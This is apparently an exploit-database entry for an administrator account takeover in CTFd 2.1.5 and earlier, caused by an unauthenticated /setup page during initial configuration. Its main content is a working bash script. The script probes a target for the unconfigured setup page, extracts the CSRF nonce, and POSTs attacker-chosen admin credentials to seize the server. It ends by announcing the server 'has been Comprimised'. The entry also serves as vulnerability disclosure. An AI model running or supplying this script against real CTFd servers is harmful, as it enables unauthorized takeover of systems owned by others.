CTFd 2.1.5 Administrator Account Takeover

`# Exploit Title: CTFd Administrator Account Takeover  
# Date: 2/1/20  
# Exploit Author: Social Engineering Neo - @EngineeringNeo  
# Vendor Homepage: https://ctfd.io  
# Software Link: https://github.com/CTFd/CTFd/releases/tag/2.1.5  
# Version: CTFd Local/Remote Hosting 2.1.5 and below  
# Tested on: CTFd 2.1.5  
  
  
CTFd Server Administrator Account Takeover Vulnerability by Social Engineering Neo.  
  
  
Tested On: -  
Live Remote Hosted CTFd v2.1.5 Server.  
Local Hosted CTFd v2.1.5 Server.  
Windows  
MacOS  
Linux  
  
  
Class: -  
Improper Authorization - CWE-285  
  
  
Base: -  
Direct Request 'Forced Browsing' - CWE-425  
  
  
Summary: -  
Due to Improper Authorization Checks and Direct Request Protections, Newly Created CTF'd Servers Have the Potential of a "Full" Administrator Account Takeover During the Setup Process. This Includes the Given URL Prior to and During SETUP/UNTIL "Save-State".  
  
  
Short Description: -  
A remote attacker with knowledge of this new CTF'd hostname could modify critical configurations of the server. This is only possible while the server admin is performing the initial setup.  
  
  
Proof of Concept: -  
####  
VICTIM – (Server Admin)  
1.) - Setting up CTF'd server configuration as usual.  
  
ATTACKER  
1.) - Knowledge of newly created CTFd hostname.  
2.) - Access https://[HOST].ctfd.io to verify the server is up.  
3.) - Access https://[HOST].ctfd.io/setup to set/modify server Administrator password, username and email – no authentication/authorization required to input these values  
4.) - Login with new admin credentials at https://[HOST].ctfd.io/login  
####  
  
CODE: - (BASH)  
####  
#!/bin/bash  
  
clear  
read -p "Enter Target Address Followed by Port: " target port # localhost 8080  
  
if [ $port -lt 65536 ] && [ $port -gt 0 ]; then  
curl --silent -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' $target:$port/setup > preexp #Downloaded to check <title>, <h1> and nonce values.  
else  
echo "Incorrect Port."  
fi  
  
titleCheck=$(grep '<title>CTFd</title>' preexp) #If server is not configured, default <title> value is 'CTFd' until admin changes  
headerOneCheck=$(grep '<h1>Setup</h1>' preexp) #Due to the possibility of admin naming server to 'CTFd', a check for <h1> value 'Setup' is made to double check.  
nonce=$(grep 'var csrf_nonce' preexp | awk '{print $4}' | sed 's/.//;s/..$//') #This nonce will include cookie value of 'session=00000000-0000-0000-0000-000000000000' so don't worry;)  
rm preexp  
  
if [ $titleCheck = "<title>CTFd</title>" ] && [ $headerOneCheck = "<h1>Setup</h1>" ]; then  
read -p "Target is Vulnerable, Would you Like to Attack? (Y/n): " attack  
if [ "$attack" = 'y' ] || [ "$attack" = 'Y' ]; then  
clear  
read -p 'CTF Name: ' ctfName #Name for the CTF  
read -p 'Admin Username: ' adminName #Username for the administration account  
read -p 'Admin Email: ' adminEmail #Email address for the administration account  
read -p 'Admin Password: ' adminPassword #Password for the administration account  
read -p 'User Mode (teams/users): ' userMode #Dictates whether users join teams to play (Team Mode) or play as themselves (User Mode)  
clear  
  
echo Working on it...  
curl --silent -i -X POST -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' --data 'nonce='$nonce'&ctf_name='$ctfName'&name='$adminName'&email='$adminEmail'&password='$adminPassword'&user_mode='$userMode'' http://$target:$port/setup #Send previously entered values to $target  
clear  
echo Attack Executed!  
  
curl --silent -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' $target:$port/setup > postexp #Verify successful exploit  
titleCheck=$(grep '<title>CTFd</title>' postexp)  
headerOneCheck=$(grep '<h1>Setup</h1>' postexp)  
rm postexp  
  
if [ $titleCheck = "<title>CTFd</title>" ] && [ $headerOneCheck = "<h1>Setup</h1>" ]; then #Values should be diffrent from what we started with pre-setup  
clear  
echo Something went Wrong, Try Again.  
else  
clear  
echo 'CTFd Server Hosted @ '$target' has been Comprimised:)'  
fi  
fi  
else  
echo Something went Wrong, Try Again.  
fi  
  
####  
[ADMIN USER TAKEOVER SUCCESSFUL]  
####  
  
VIDEO: - https://youtu.be/li9dX7CUTTg *Exploit*  
: - https://youtu.be/bQyVyXzvHCo *Demo*  
  
  
Expected Result: -  
Users should not have the ability to read/write critical server/user configuration without proper authentication.  
  
  
Observed Result: -  
Unauthorized users have the ability to read/write critical server/user configuration without any authentication.  
`